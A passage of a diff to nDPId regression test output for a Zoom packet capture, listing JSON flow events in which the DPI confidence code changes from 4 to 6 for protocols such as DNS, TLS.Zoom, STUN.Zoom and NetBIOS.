{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466080,"flow_last_seen":1569520472536,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":796,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569520473084,"flow_last_seen":1569520473198,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":318,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569520473084,"flow_last_seen":1569520473198,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":318,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469221,"flow_last_seen":1569520469399,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469189,"flow_last_seen":1569520469375,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469253,"flow_last_seen":1569520469433,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469221,"flow_last_seen":1569520469399,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469189,"flow_last_seen":1569520469375,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 
+00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469253,"flow_last_seen":1569520469433,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1569520466316,"flow_last_seen":1569520471572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2925,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 
-00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":185,"flow_first_seen":1569520471748,"flow_last_seen":1569520473190,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":1029,"flow_tot_l4_payload_len":184465,"flow_avg_l4_payload_len":997,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569520471915,"flow_last_seen":1569520473157,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 